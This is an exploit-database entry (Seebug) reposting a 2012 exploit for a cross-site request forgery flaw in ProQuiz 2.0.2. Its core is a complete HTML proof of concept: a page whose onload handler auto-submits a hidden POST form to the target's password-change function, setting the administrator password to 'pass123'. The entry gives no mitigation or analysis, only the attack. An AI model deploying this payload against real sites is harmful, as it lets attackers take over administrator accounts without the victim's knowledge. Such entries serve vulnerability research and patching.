ProQuiz 2.0.2 - CSRF Vulnerability

2014-07-01T00:00:00
ID SSV:74421
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ##########################################

[~] Exploit Title: ProQuiz v2.0.2 CSRF Vulnerability

[~] Author: DaOne

[~] Date: 19/8/2012

[~] Software Link: http://code.google.com/p/proquiz/downloads/list

##########################################



[#] [ CSRF Change Admin Password ]



</form>

<html>

<body onload="document.form0.submit();">

<form method="POST" name="form0" action="http://[target]/functions.php?action=edit_profile&type=password">

<input type="hidden" name="password" value="pass123"/>

<input type="hidden" name="cpassword" value="pass123"/>

</form>

</body>

</html>



##########################################